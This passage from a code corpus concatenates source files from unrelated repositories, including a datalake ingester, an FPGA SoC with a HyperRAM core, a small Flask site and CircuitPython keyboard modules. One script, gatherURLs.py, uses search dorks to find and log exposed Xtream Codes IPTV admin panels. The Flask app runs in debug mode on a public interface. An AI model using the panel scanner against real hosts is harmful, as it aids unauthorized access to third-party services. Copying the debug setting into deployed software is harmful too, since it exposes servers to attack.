Translator('here-a~there-a~')
def test_format_missing_right_brace():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{job_id')
t.translate('/var/log/jobs/job-1234.log')
def test_format_missing_left_brace():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~jobjob_id}')
t.translate('/var/log/jobs/job-1234.log')
def test_format_missing_named_group():
with pytest.raises(TranslatorError):
t = Translator('.*job-([0-9]+).log$~job{job_id}')
t.translate('/var/log/jobs/job-1234.log')
def test_invalid_group_name():
with pytest.raises(TranslatorError):
Translator('.*job-(?P<job_id[0-9]+).log$~job{job_id}')
def test_unbalanced_parenthesis():
with pytest.raises(TranslatorError):
Translator('.*job-(?P<job_id>[0-9]+.log$~job{job_id}')
def test_extract_does_not_match():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{job_id}')
t.translate('/var/log/jobs/foo-1234.log')
def test_unexpected_name_in_format():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{foo_id}')
t.translate('/var/log/jobs/job-1234.log')
def test_not_absolute_path():
with pytest.raises(TranslatorError):
t = Translator('.*job-(?P<job_id>[0-9]+).log$~job{job_id}')
t.translate('var/log/jobs/job-1234.log')
```
#### File: ingester/datalake_ingester/ingester.py
```python
from datalake.common import DatalakeRecord, InvalidDatalakeMetadata
from datalake.common.errors import InsufficientConfiguration, \
UnsupportedTimeRange, NoSuchDatalakeFile, UnsupportedS3Event
from s3_notification import S3Notification
import time
import logging
from storage import DynamoDBStorage
from queue import SQSQueue
from reporter import SNSReporter
from errors import InvalidS3Notification, InvalidS3Event
logger = logging.getLogger('ingester')
# This is a list of exceptions that we may encounter that do not compromise our
# ability to ingest. These we simply wish to log, report, and move on.
SAFE_EXCEPTIONS = [
InvalidS3Notification,
InvalidS3Event,
UnsupportedTimeRange,
NoSuchDatalakeFile,
InvalidDatalakeMetadata,
UnsupportedS3Event
]
class IngesterReport(dict):
def start(self):
self.start = time.time()
self['start'] = int(self.start * 1000)
self.records = {}
return self
def add_record(self, r):
self.records[r['url']] = r
def end(self):
self['status'] = 'success'
self._finalize_report()
return self
def error(self, message):
self['status'] = 'error'
self['message'] = message
self._finalize_report()
return self
def _finalize_report(self):
self._set_records()
self._set_duration()
def _set_duration(self):
self['duration'] = time.time() - self.start
def _set_records(self):
self['records'] = [self._make_record(r) for r in self.records.values()]
def _make_record(self, r):
return {
'url': r['url'],
'size': r['size'],
'create_time': r['create_time'],
'metadata': r['metadata']
}
class Ingester(object):
def __init__(self, storage, queue=None, reporter=None):
self.storage = storage
self.queue = queue
self.reporter = reporter
@classmethod
def from_config(cls):
storage = DynamoDBStorage.from_config()
queue = SQSQueue.from_config()
reporter = SNSReporter.from_config()
return cls(storage, queue=queue, reporter=reporter)
def ingest(self, url):
'''ingest the metadata associated with the given url'''
records = DatalakeRecord.list_from_url(url)
for r in records:
self.storage.store(r)
def handler(self, msg):
ir = IngesterReport().start()
try:
self._handler(msg, ir)
ir.end()
except Exception as e:
logger.exception(e)
ir.error(e.message)
if type(e) not in SAFE_EXCEPTIONS:
raise
finally:
self._report(ir)
def _handler(self, s3_notification, ir):
n = S3Notification(s3_notification)
for e in n.events:
if e.event_name == 'ObjectCreated:Put':
self._add_records(e.datalake_records, ir)
elif e.event_name == 'ObjectCreated:Copy':
self._update_records(e.datalake_records, ir)
elif e.event_name == 'ObjectCreated:CompleteMultipartUpload':
self._add_records(e.datalake_records, ir)
else:
msg = 'Datalake does not support S3 publish event type {}.'
msg = msg.format(e.event_name)
raise UnsupportedS3Event(msg)
def _add_records(self, datalake_records, ir):
for r in datalake_records:
ir.add_record(r)
self.storage.store(r)
def _update_records(self, datalake_records, ir):
for r in datalake_records:
ir.add_record(r)
self.storage.update(r)
def _report(self, r):
if self.reporter is None:
return
self.reporter.report(r)
def listen(self, timeout=None):
'''listen to the queue, ingest what you hear, and report'''
if not self.queue:
raise InsufficientConfiguration('No queue configured.')
self.queue.set_handler(self.handler)
self.queue.drain(timeout=timeout)
```
#### File: ingester/datalake_ingester/s3_notification.py
```python
from memoized_property import memoized_property
import simplejson as json
from errors import InvalidS3Notification, InvalidS3Event
from datalake.common import DatalakeRecord
class S3Notification(dict):
def __init__(self, s3_notification):
self.message = s3_notification.get('Message')
if self.message is None:
raise InvalidS3Notification(self.message)
self.message = json.loads(self.message)
super(S3Notification, self).__init__(self.message)
@memoized_property
def events(self):
if self.get('Event') == 's3:TestEvent':
return []
return [S3Event(r) for r in self.message['Records']]
class S3Event(dict):
EVENTS_WITH_RECORDS = [
'ObjectCreated:Put',
'ObjectCreated:Copy',
'ObjectCreated:CompleteMultipartUpload'
]
def __init__(self, event):
super(S3Event, self).__init__(event)
self._validate()
def _validate(self):
self._validate_version()
def _validate_version(self):
v = self.get('eventVersion')
if v is None:
msg = 'No eventVersion: ' + json.dumps(self)
raise InvalidS3Event(msg)
if not v.startswith('2.'):
msg = 'Unsupported event version: ' + json.dumps(self)
raise InvalidS3Event(msg)
@memoized_property
def datalake_records(self):
if self['eventName'] not in self.EVENTS_WITH_RECORDS:
return []
return [dlr for dlr in DatalakeRecord.list_from_url(self.s3_url)]
@property
def s3_url(self):
return 's3://' + self.bucket_name + '/' + self.key_name
@property
def bucket_name(self):
return self['s3']['bucket']['name']
@property
def key_name(self):
return self['s3']['object']['key']
@property
def event_name(self):
return self['eventName']
```
#### File: ingester/tests/test_queue.py
```python
import pytest
import time
import simplejson as json
from datalake_ingester import SQSQueue
@pytest.fixture
def handler():
class Handler(object):
messages = []
def __call__(self, msg):
self.messages.append(msg)
return Handler()
def test_sqs_queue_timeout(bare_sqs_queue, handler):
q = SQSQueue(bare_sqs_queue.name, handler)
start = time.time()
q.drain(timeout=1)
duration = time.time() - start
error = abs(duration - 1.0)
assert error < 0.1
assert handler.messages == []
def test_sqs_queue_drain(bare_sqs_queue, handler):
q = SQSQueue(bare_sqs_queue.name, handler)
expected_msg = {'foo': 'bar'}
msg = bare_sqs_queue.new_message(json.dumps(expected_msg))
bare_sqs_queue.write(msg)
q.drain(timeout=1)
assert handler.messages == [expected_msg]
handler.messages = []
q.drain(timeout=1)
assert handler.messages == []
```
#### File: ingester/tests/test_s3_notifications.py
```python
import pytest
from datalake_ingester import S3Notification
from freezegun import freeze_time
def _import_exception(exception_name):
mod_name = '.'.join(exception_name.split('.')[0:-1])
exception_name = exception_name.split('.')[-1]
mod = __import__(mod_name, fromlist=[str(exception_name)])
return getattr(mod, exception_name)
def _get_records(s3_notification):
n = S3Notification(s3_notification)
records = []
for e in n.events:
records += e.datalake_records
return records
@freeze_time('1977-07-01T03:01:00Z')
def test_s3_notifications(event_test_driver):
def tester(event):
if 's3_notification_exception' in event:
exception = _import_exception(event['s3_notification_exception'])
with pytest.raises(exception):
_get_records(event['s3_notification'])
else:
records = _get_records(event['s3_notification'])
assert records == event['expected_datalake_records']
event_test_driver(tester)
```
#### File: ingester/tests/test_storage.py
```python
from datalake_ingester import DynamoDBStorage
def test_dynamodb_store(dynamodb_users_table, dynamodb_connection):
storage = DynamoDBStorage('users', connection=dynamodb_connection)
expected_user = {'name': 'John', 'last_name': 'Muir'}
storage.store(expected_user)
user = dict(dynamodb_users_table.get_item(name='John', last_name='Muir'))
assert dict(user) == expected_user
def test_store_duplicate(dynamodb_users_table, dynamodb_connection):
storage = DynamoDBStorage('users', connection=dynamodb_connection)
expected_user = {'name': 'Vanilla', 'last_name': 'Ice'}
storage.store(expected_user)
storage.store(expected_user)
user = dict(dynamodb_users_table.get_item(name='Vanilla', last_name='Ice'))
assert dict(user) == expected_user
``` |
{
"source": "JP-Clemente/Programming_Projects",
"score": 3
} |
#### File: Programming_Projects/A*_8_Puzzle/Posicao.py
```python
class Posicao:
def __init__(self, l, c):
self.linha = l
self.coluna = c
def getLinha(self):
return self.linha
def setLinha(self, linha):
self.linha = linha
def getColuna(self):
return self.coluna
def setColuna(self, coluna):
self.coluna = coluna;
``` |
{
"source": "jpc-lip6/mpw4",
"score": 2
} |
#### File: mpw4/cores/hyperram.py
```python
from amaranth import *
from thirdparty.amaranth_soc import wishbone
from thirdparty.amaranth_soc.memory import MemoryMap
from thirdparty.lambdasoc.periph import Peripheral
# for Migen compat
def timeline(m, trigger, events):
lastevent = max([e[0] for e in events])
counter = Signal(range(lastevent+1))
# insert counter reset if it doesn't naturally overflow
# (test if lastevent+1 is a power of 2)
with m.If(((lastevent & (lastevent + 1)) != 0) & (counter == lastevent)):
m.d.sync += counter.eq(0)
with m.Elif(counter != 0):
m.d.sync += counter.eq(counter + 1)
with m.Elif(trigger):
m.d.sync += counter.eq(1)
def get_cond(e):
if e[0] == 0:
return trigger & (counter == 0)
else:
return counter == e[0]
for ev in events:
with m.If(get_cond(ev)):
m.d.sync += ev[1]
# HyperRAM -----------------------------------------------------------------------------------------
class HyperRAM(Peripheral, Elaboratable):
"""HyperRAM
Provides a very simple/minimal HyperRAM core that should work with all FPGA/HyperRam chips:
- FPGA vendor agnostic.
- no setup/chip configuration (use default latency).
This core favors portability and ease of use over performance.
"""
def __init__(self, *, io):
super().__init__()
self.io = io
self.bus = wishbone.Interface(addr_width=21,
data_width=32, granularity=8)
map = MemoryMap(addr_width=23, data_width=8)
map.add_resource("hyperram", size=2**23)
self.bus.memory_map = map
self.size = 2**23
# # #
def elaborate(self, platform):
m = Module()
clk = Signal()
clk_phase = Signal(2)
cs = Signal()
ca = Signal(48)
sr = Signal(48)
dq_o = Signal(8)
dq_i = Signal(8)
dq_oe = Signal()
rwds_o = self.io["rwds_o"]
rwds_oe = Signal()
m.d.comb += [
self.io["csn_o"].eq(~cs),
self.io["csn_oeb"].eq(0),
self.io["clk_o"].eq(clk),
self.io["clk_oeb"].eq(0),
self.io["rwds_oeb"].eq(~rwds_oe),
]
for i in range(8):
m.d.comb += [
self.io[f"d{i}_o"].eq(dq_o[i]),
self.io[f"d{i}_oeb"].eq(~dq_oe),
dq_i[i].eq(self.io[f"d{i}_i"])
]
# Clock Generation (sys_clk/4) -------------------------------------------------------------
m.d.sync += clk_phase.eq(clk_phase + 1)
with m.Switch(clk_phase):
with m.Case(1):
m.d.sync += clk.eq(cs)
with m.Case(3):
m.d.sync += clk.eq(0)
# Data Shift Register (for write and read) -------------------------------------------------
dqi = Signal(8)
m.d.sync += dqi.eq(dq_i) # Sample on 90° and 270°
with m.Switch(clk_phase):
with m.Case(0, 2):
m.d.sync += sr.eq(Cat(dqi, sr[:-8]))
m.d.comb += [
self.bus.dat_r.eq(sr), # To Wisbone
dq_o.eq(sr[-8:]), # To HyperRAM
]
# Command generation -----------------------------------------------------------------------
m.d.comb += [
ca[47].eq(~self.bus.we), # R/W#
ca[45].eq(1), # Burst Type (Linear)
ca[16:35].eq(self.bus.adr[2:21]), # Row & Upper Column Address
ca[1:3].eq(self.bus.adr[0:2]), # Lower Column Address
ca[0].eq(0), # Lower Column Address
]
# Sequencer --------------------------------------------------------------------------------
dt_seq = [
# DT, Action
(3, []),
(12, [cs.eq(1), dq_oe.eq(1), sr.eq(ca)]), # Command: 6 clk
(44, [dq_oe.eq(0)]), # Latency(default): 2*6 clk
(2, [dq_oe.eq(self.bus.we), # Write/Read data byte: 2 clk
sr[:16].eq(0),
sr[16:].eq(self.bus.dat_w),
rwds_oe.eq(self.bus.we),
rwds_o.eq(~self.bus.sel[3])]),
(2, [rwds_o.eq(~self.bus.sel[2])]), # Write/Read data byte: 2 clk
(2, [rwds_o.eq(~self.bus.sel[1])]), # Write/Read data byte: 2 clk
(2, [rwds_o.eq(~self.bus.sel[0])]), # Write/Read data byte: 2 clk
(2, [cs.eq(0), rwds_oe.eq(0), dq_oe.eq(0)]),
(1, [self.bus.ack.eq(1)]),
(1, [self.bus.ack.eq(0)]),
(0, []),
]
# Convert delta-time sequencer to time sequencer
t_seq = []
t_seq_start = (clk_phase == 1)
t = 0
for dt, a in dt_seq:
t_seq.append((t, a))
t += dt
timeline(m, self.bus.cyc & self.bus.stb & t_seq_start, t_seq)
return m
def add_tristate(self, pad):
t = TSTriple(len(pad))
self.specials += t.get_tristate(pad)
return t
```
#### File: mpw4/soc/test_soc.py
```python
import argparse
import importlib
from amaranth import *
from thirdparty.amaranth_soc import wishbone
from thirdparty.lambdasoc.cpu.minerva import MinervaCPU
from thirdparty.lambdasoc.periph.intc import GenericInterruptController
from thirdparty.lambdasoc.periph.serial import AsyncSerialPeripheral
from thirdparty.lambdasoc.periph.sram import SRAMPeripheral
from thirdparty.lambdasoc.periph.timer import TimerPeripheral
from thirdparty.lambdasoc.soc.cpu import CPUSoC
from cores.gpio import GPIOPeripheral
from cores.spimemio_wrapper import SPIMemIO
from cores.hyperram import HyperRAM
class HyperRamSoC(CPUSoC, Elaboratable):
def __init__(self, *, small, reset_addr, clk_freq,
rom_addr, flash_ctrl_addr, flash_pins,
hram_addr, hyperram_pins,
sram_addr, sram_size,
uart_addr, uart_divisor, uart_pins,
timer_addr, timer_width,
gpio_addr, gpio_count, gpio_pins):
self._arbiter = wishbone.Arbiter(addr_width=30, data_width=32, granularity=8)
self._decoder = wishbone.Decoder(addr_width=30, data_width=32, granularity=8)
self.cpu = MinervaCPU(reset_address=reset_addr, with_muldiv=(not small))
self._arbiter.add(self.cpu.ibus)
self._arbiter.add(self.cpu.dbus)
self.rom = SPIMemIO(flash=flash_pins)
self._decoder.add(self.rom.data_bus, addr=rom_addr)
self._decoder.add(self.rom.ctrl_bus, addr=flash_ctrl_addr)
self.ram = SRAMPeripheral(size=sram_size)
self._decoder.add(self.ram.bus, addr=sram_addr)
self.hyperram = HyperRAM(io=hyperram_pins)
self._decoder.add(self.hyperram.bus, addr=hram_addr)
self.uart = AsyncSerialPeripheral(divisor=uart_divisor, pins=uart_pins, rx_depth=4, tx_depth=4)
self._decoder.add(self.uart.bus, addr=uart_addr)
self.timer = TimerPeripheral(width=timer_width)
self._decoder.add(self.timer.bus, addr=timer_addr)
self.intc = GenericInterruptController(width=len(self.cpu.ip))
self.intc.add_irq(self.timer.irq, 0)
self.intc.add_irq(self.uart .irq, 1)
self.gpio = GPIOPeripheral(gpio_count, gpio_pins)
self._decoder.add(self.gpio.bus, addr=gpio_addr)
self.memory_map = self._decoder.bus.memory_map
self.clk_freq = clk_freq
def elaborate(self, platform):
m = Module()
m.submodules.arbiter = self._arbiter
m.submodules.cpu = self.cpu
m.submodules.decoder = self._decoder
m.submodules.rom = self.rom
m.submodules.ram = self.ram
m.submodules.hyperram = self.hyperram
m.submodules.uart = self.uart
m.submodules.timer = self.timer
m.submodules.gpio = self.gpio
m.submodules.intc = self.intc
m.d.comb += [
self._arbiter.bus.connect(self._decoder.bus),
self.cpu.ip.eq(self.intc.ip),
]
return m
def parse_pinout():
result = {}
import pathlib
with open(pathlib.Path(__file__).parent / "pinout_plan.txt", "r") as f:
for line in f:
sl = [x for x in line.strip().split(' ') if x]
if len(sl) != 2: continue
result[sl[1]] = int(sl[0])
return result
# Create a pretend UART resource with arbitrary signals
class UARTPins():
class Input():
def __init__(self, sig):
self.i = sig
class Output():
def __init__(self, sig):
self.o = sig
def __init__(self, rx, tx):
self.rx = UARTPins.Input(rx)
self.tx = UARTPins.Output(tx)
class SoCWrapper(Elaboratable):
def __init__(self, build_dir="build", small=False, with_bios=True):
io_count = 38
self.build_dir = build_dir
self.small = small
self.with_bios = with_bios
self.io_in = Signal(io_count)
self.io_out = Signal(io_count)
self.io_oeb = Signal(io_count)
self.pinout = parse_pinout()
def i(self, name): return self.io_in[self.pinout[name]]
def o(self, name): return self.io_out[self.pinout[name]]
def oeb(self, name): return self.io_oeb[self.pinout[name]]
def elaborate(self, platform):
m = Module()
# Gets i, o, oeb in a dict for all pins starting with a prefix
def resource_pins(resource):
result = {}
for pin, bit in self.pinout.items():
if pin.startswith(resource):
bit_name = pin[len(resource):]
result[f"{bit_name}_i"] = Signal()
result[f"{bit_name}_o"] = Signal()
result[f"{bit_name}_oeb"] = Signal()
m.d.comb += [
self.io_out[bit].eq(result[f"{bit_name}_o"]),
self.io_oeb[bit].eq(result[f"{bit_name}_oeb"]),
result[f"{bit_name}_i"].eq(self.io_in[bit]),
]
return result
# Clock input
m.domains.sync = ClockDomain(async_reset=False)
m.d.comb += ClockSignal().eq(self.i("clk"))
# Reset synchroniser
rst = Signal()
m.d.comb += rst.eq(~self.i("rstn"))
rst_sync0 = Signal(reset_less=True)
rst_sync1 = Signal(reset_less=True)
m.d.sync += [
rst_sync0.eq(rst),
rst_sync1.eq(rst_sync0),
]
m.d.comb += [
ResetSignal().eq(rst_sync1),
self.o("rst_inv_out").eq(rst), # mirror to some pins for debugging
self.o("rst_sync_out").eq(rst_sync1),
]
uart_pins = UARTPins(rx=self.i("uart_rx"), tx=self.o("uart_tx"))
# The SoC itself
m.submodules.soc = HyperRamSoC(
reset_addr=0x00100000, clk_freq=int(27e6), small=self.small,
rom_addr=0x00000000, flash_ctrl_addr=0x10007000, flash_pins=resource_pins("flash_"),
hram_addr=0x20000000, hyperram_pins=resource_pins("ram_"),
sram_addr=0x10004000, sram_size=(0x40 if self.small else 0x200),
uart_addr=0x10005000, uart_divisor=int(27e6 // 9600), uart_pins=uart_pins,
timer_addr=0x10006000, timer_width=32,
gpio_addr=0x10008000, gpio_count=8, gpio_pins=resource_pins("gpio_"),
)
if self.with_bios:
m.submodules.soc.build(build_dir=f"{self.build_dir}/soc", do_init=True)
# Heartbeat counter so we can confirm basic logic works
hb_ctr = Signal(24)
m.d.sync += hb_ctr.eq(hb_ctr + 1)
m.d.comb += [
self.o("heartbeat_0").eq(hb_ctr[0]),
self.o("heartbeat_1").eq(hb_ctr[23]),
]
# Remaining pins
for pin, bit in self.pinout.items():
if pin in ("clk", "rstn", "uart_rx") or pin.startswith("unalloc_"): # inputs and TODOs
m.d.comb += [
self.io_oeb[bit].eq(1),
self.io_out[bit].eq(0),
]
elif pin.startswith("heartbeat") or pin in ("rst_inv_out", "rst_sync_out", "uart_tx"): # outputs
m.d.comb += [
self.io_oeb[bit].eq(0),
]
return m
if __name__ == "__main__":
wrapper = SoCWrapper()
from amaranth.cli import main
main(wrapper, name="soc_wrapper", ports=[wrapper.io_in, wrapper.io_out, wrapper.io_oeb])
``` |
{
"source": "jpco/bittybio",
"score": 3
} |
#### File: jpco/bittybio/app.py
```python
from flask import Flask, render_template, redirect
import rethinkdb as r
app = Flask(__name__)
@app.route('/')
def main():
return render_template('main.html')
@app.route('/<user>')
def bio(user):
rconn = r.connect('localhost')
useri = r.db('bittybio').table('users').get(user).run(rconn)
rconn.close()
if useri == None:
return 'Sorry! We couldn\'t find '+user+'.'
else:
return render_template('bio.html', **useri)
@app.route('/<user>/edit')
def editbio(user):
rconn = r.connect('localhost')
useri = r.db('bittybio').table('users').get(user).run(rconn)
rconn.close()
if useri == None:
return 'Sorry! We couldn\'t find '+user+'.'
else:
return render_template('edit.html', **useri)
@app.route('/<user>/bb')
def touser(user):
return redirect(user)
@app.route('/<user>/<net>')
def usersnet(user, net):
rconn = r.connect('localhost')
userdata = r.db('bittybio').table('users').get(user).run(rconn)
netdata = r.db('bittybio').table('nets').get(net).run(rconn)
if userdata == None or netdata == None:
return 'User or network undefined!'
goto_name = []
for dnet in userdata['nets']:
if dnet['net'] == net:
goto_name.append(dnet['url'])
try:
url = netdata['user_url']
except KeyError:
url = netdata['url']
if len(goto_name) > 1:
return "Multiple potential URLs found."
elif netdata['prefix']:
return redirect('http://'+goto_name[0]+'.'+url)
else:
return redirect('http://'+url+goto_name[0])
if __name__ == "__main__":
app.run(host='0.0.0.0', port=80, debug=True)
``` |
{
"source": "JPCodaLot/textadventure",
"score": 4
} |
#### File: JPCodaLot/textadventure/main.py
```python
import json # Used to parse the map.json file
import time # Used to add wait time during printing
from termcolor import cprint # Used to print in different colors
# Load the map file
m = json.loads(open("map.json").read())
inventory = []
# Defining print room function
def gotoRoom(number):
# Get the room from it's number
room = m["rooms"][number]
# Tell about the room
cprint(room["name"],"blue")
print(room["description"]+"\n")
time.sleep(1)
# Quit the game if finished
if number == m["finish"]:
quit()
# Show the inventory
cprint("Inventory:"+str(m["inventory"])+"\n", "yellow")
# Display the menu
while True:
# Wait one second
time.sleep(1)
# Ask the user how they would like to continue
print("What would you like to do? \nHint: Enter the first letter of the corresponding with the action you would like to make")
if "item" in room:
print("- Look around")
if "n" in room["exits"]:
print("- North")
if "s" in room["exits"]:
print("- South")
if "w" in room["exits"]:
print("- West")
if "e" in room["exits"]:
print("- East")
print() # Print blank newline
UserChoice = input().lower()
# Defining walk to room function
def walk(direction):
print("You have chosen to walk " + direction + "...\n")
if UserChoice in room["exits"]:
nextRoom = m["rooms"][room["exits"][UserChoice]]
# Check if all the reqiured items are in the inventory
if "require" in nextRoom:
if set(nextRoom["require"]).issubset(set(m["inventory"])):
gotoRoom(room["exits"][UserChoice])
else:
cprint(nextRoom["clue"]+"\n","red")
else:
gotoRoom(room["exits"][UserChoice])
else:
cprint("You cannot walk " + direction + ", there is a wall blocking your way.\n", "red")
# Look around
if UserChoice == "l":
print("You have chosen to look around...")
if "item" in room:
if room["item"] in m["inventory"]:
print("You have already looked through this room.\n")
else:
print(m["items"][room["item"]]+"\n")
time.sleep(1)
cprint(room["item"] + " added to your inventory.\n", "yellow")
m["inventory"].append(room["item"])
else:
print("You found nothing of value.\n")
# Walk in direction
elif UserChoice == "n":
walk("north")
elif UserChoice == "s":
walk("south")
elif UserChoice == "w":
walk("west")
elif UserChoice == "e":
walk("east")
# Invalid answer
else:
cprint("Please select a valid answer.", "red")
# Print the title and rules
cprint(m["title"]+" by "+m["author"]+"\n","green")
cprint(m["rules"]+"\n","green")
# Start the game on enter
print("Press enter to start")
input()
gotoRoom(m["start"])
``` |
{
"source": "jpcompgr123/iptv",
"score": 3
} |
#### File: jpcompgr123/iptv/gatherURLs.py
```python
try:
from requests import get
from urlparse import urlparse
from duckduckgo import search
from sys import argv
except ImportError as e:
print str(e)
def extractUrls(dorks):
temp = []
for dork in open(dorks, "r").readlines():
for link in search(dork.strip(), max_results=400):
if link not in temp:
temp.append(link)
return temp
def checkUrls(urls):
temp = []
for url in urls:
url = urlparse(url.strip())[1]
if url not in temp:
temp.append(url)
print "[i] Found %s in total." % (len(temp))
return temp
def aliveOrNot(urls):
temp = []
print "[*] Hunting URLs for Admin panel"
for url in urls:
try:
if "Xtream Codes</a>" in get("http://%s/" % (url), timeout=10).text:
print "\t{%s} Panel found on URL -->> http://%s/" % (len(temp+1),url)
temp.append(url)
except Exception as e:
# print "\tNo Panel found -->> http://%s/" %(url)
pass
print "[i] %s of them are alive!" % (len(temp))
f = open("urls.txt", "a+")
for url in temp:
f.write("http://%s/\n" %(url))
f.close()
if __name__ == '__main__':
try:
dorks = argv[1]
aliveOrNot(checkUrls(extractUrls(dorks)))
except Exception as e:
print "Error\n%s" % (str(e))
``` |
{
"source": "jpconstantineau/CircuitPython_pykey",
"score": 3
} |
#### File: CircuitPython_pykey/pykey/BitmapKeyboard.py
```python
from adafruit_hid.keyboard import Keyboard, find_device
from adafruit_hid.keycode import Keycode
class BitmapKeyboard(Keyboard):
"""
Module representing a NKRO Keyboard
"""
def __init__(self, devices):
device = find_device(devices, usage_page=0x1, usage=0x6)
try:
device.send_report(b"\0" * 16)
except ValueError:
print(
"found keyboard, but it did not accept a 16-byte report. "
+ "check that boot.py is installed properly"
)
self._keyboard_device = device
# report[0] modifiers
# report[1:16] regular key presses bitmask
self.report = bytearray(16)
self.report_modifier = memoryview(self.report)[0:1]
self.report_bitmap = memoryview(self.report)[1:]
def _add_keycode_to_report(self, keycode):
modifier = Keycode.modifier_bit(keycode)
if modifier:
# Set bit for this modifier.
self.report_modifier[0] |= modifier
else:
self.report_bitmap[keycode >> 3] |= 1 << (keycode & 0x7)
def _remove_keycode_from_report(self, keycode):
modifier = Keycode.modifier_bit(keycode)
if modifier:
# Set bit for this modifier.
self.report_modifier[0] &= ~modifier
else:
self.report_bitmap[keycode >> 3] &= ~(1 << (keycode & 0x7))
def release_all(self):
"""
Module representing a NKRO Keyboard
"""
for i in range(len(self.report)):
self.report[i] = 0
self._keyboard_device.send_report(self.report)
```
#### File: CircuitPython_pykey/pykey/__init__.py
```python
__version__ = "0.0.0-auto.0"
__repo__ = "https://github.com/jpconstantineau/CircuitPython_pykey.git"
import os
import usb_hid
from adafruit_hid.keyboard import Keyboard
from BitmapKeyboard import BitmapKeyboard
class KB_Hardware:
"""
Class representing a keyboard Hardware without the specifics...
"""
def __init__(self, nkro: bool = False):
self._board_type = os.uname().machine
self._keyboard = None
self._pixels = None
self._leds = None
self._speaker = None
self._encoder = None
self._keys = None
self._nkro = nkro
self._key_to_position = None
self._position_to_key = None
@property
def key_to_position(self):
"""
Module representing a keyboard procesing loop..
"""
return self._key_to_position
@property
def position_to_key(self):
"""
Module representing a keyboard procesing loop..
"""
return self._position_to_key
@property
def keys(self):
"""
The keys on the MacroPad. Uses events to track key number and state, e.g. pressed or
released. You must fetch the events using ``keys.events.get()`` and then the events are
available for usage in your code. Each event has three properties:
* ``key_number``: the number of the key that changed. Keys are numbered starting at 0.
* ``pressed``: ``True`` if the event is a transition from released to pressed.
* ``released``: ``True`` if the event is a transition from pressed to released.
``released`` is always the opposite of ``pressed``; it's provided
for convenience and clarity, in case you want to test for
key-release events explicitly.
The following example prints the key press and release events to the serial console.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
while True:
key_event = macropad.keys.events.get()
if key_event:
print(key_event)
"""
return self._keys
@property
def encoder(self):
"""
The rotary encoder relative rotation position. Always begins at 0 when the code is run, so
the value returned is relative to the initial location.
The following example prints the relative position to the serial console.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
while True:
print(macropad.encoder)
"""
return self._encoder.position
@property
def speaker(self):
"""
Module representing a keyboard procesing loop..
"""
return self._speaker
@property
def leds(self):
"""
Module representing a keyboard procesing loop..
"""
return self._leds
@property
def pixels(self):
"""Sequence-like object representing the twelve NeoPixel LEDs in a 3 x 4 grid on the
MacroPad. Each pixel is at a certain index in the sequence, numbered 0-11. Colors can be an
RGB tuple like (255, 0, 0) where (R, G, B), or an RGB hex value like 0xFF0000 for red where
each two digits are a color (0xRRGGBB). Set the global brightness using any number from 0
to 1 to represent a percentage, i.e. 0.3 sets global brightness to 30%. Brightness defaults
to 1.
See ``neopixel.NeoPixel`` for more info.
The following example turns all the pixels green at 50% brightness.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
macropad.pixels.brightness = 0.5
while True:
macropad.pixels.fill((0, 255, 0))
The following example sets the first pixel red and the twelfth pixel blue.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
while True:
macropad.pixels[0] = (255, 0, 0)
macropad.pixels[11] = (0, 0, 255)
"""
return self._pixels
@property
def keyboard(self):
"""
A keyboard object used to send HID reports. For details, see the ``Keyboard`` documentation
in CircuitPython HID: https://circuitpython.readthedocs.io/projects/hid/en/latest/index.html
The following example types out the letter "a" when the rotary encoder switch is pressed.
.. code-block:: python
from adafruit_macropad import MacroPad
macropad = MacroPad()
while True:
if macropad.encoder_switch:
macropad.keyboard.send(macropad.Keycode.A)
"""
if self._keyboard is None:
if self._nkro is True:
self._keyboard = BitmapKeyboard(usb_hid.devices)
else:
self._keyboard = Keyboard(usb_hid.devices)
return self._keyboard
```
#### File: CircuitPython_pykey/pykey/ledmatrix.py
```python
from digitalio import DigitalInOut, Direction
class KB_LEDMatrix:
"""
Class Docstring
"""
# LEDMatrix(row_pins: Sequence[microcontroller.Pin],
# column_pins: Sequence[microcontroller.Pin], columns_to_anodes: bool = True)
def __init__(self, row_pins, column_pins, columns_to_anodes: bool = True):
"""
docstring
"""
self.row_pins = row_pins
self.column_pins = column_pins
self.columns_to_anodes = columns_to_anodes
self.column_io = []
self.row_io = []
for col_p in self.column_pins:
self.column_io.append(DigitalInOut(col_p))
for row_p in self.row_pins:
self.row_io.append(DigitalInOut(row_p))
def reset_leds(self):
"""
docstring
"""
for pin in self.row_io:
pin.direction = Direction.OUTPUT
pin.value = False
for pin in self.column_io:
pin.direction = Direction.OUTPUT
pin.value = False
def led_ON(self, led_number): # pylint: disable=invalid-name
"""
doctrsing
"""
self.reset_leds()
colcount = len(self.column_io)
colIO_LED = self.column_io[0] # pylint: disable=invalid-name
rowIO_LED = self.row_io[0] # pylint: disable=invalid-name
for rownum, row_pin in enumerate(self.row_io):
for colnum, col_pin in enumerate(self.column_io):
if led_number == (rownum * colcount + colnum):
colIO_LED = col_pin # pylint: disable=invalid-name
rowIO_LED = row_pin # pylint: disable=invalid-name
if self.columns_to_anodes:
col_pin.value = False
row_pin.value = True
else:
col_pin.value = True
row_pin.value = False
if self.columns_to_anodes:
colIO_LED.value = True
rowIO_LED.value = False
else:
colIO_LED.value = False
rowIO_LED.value = True
def led_OFF(self): # pylint: disable=invalid-name
"""
docstrings
"""
self.reset_leds()
``` |
{
"source": "jpconsuegra/compilers-uh",
"score": 3
} |
#### File: compilers-uh/source/base.py
```python
import pydot
import os
class Globals:
images = 0
class Graph:
def _image_name(self):
Globals.images += 1
filename = os.getenv('FILENAME')
filename = os.path.basename(filename).split(".")[0]
return f"image-{filename}-{Globals.images}"
def print(self, label="", caption="", float=True, width="50%"):
if not label:
label = self._image_name()
fname = f"build/graphics/{label}.svg"
self.graph().write_svg(fname)
output = f"{{ #{label} width={width} }}"
if not float:
output += "\\"
print(output)
def _repr_svg_(self):
return self.graph().create_svg().decode('utf8')
def graph(self) -> pydot.Graph:
raise NotImplementedError()
``` |
{
"source": "jpconsuegra/ehealthkd-2020",
"score": 3
} |
#### File: ehealthkd-2020/scripts/legacy.py
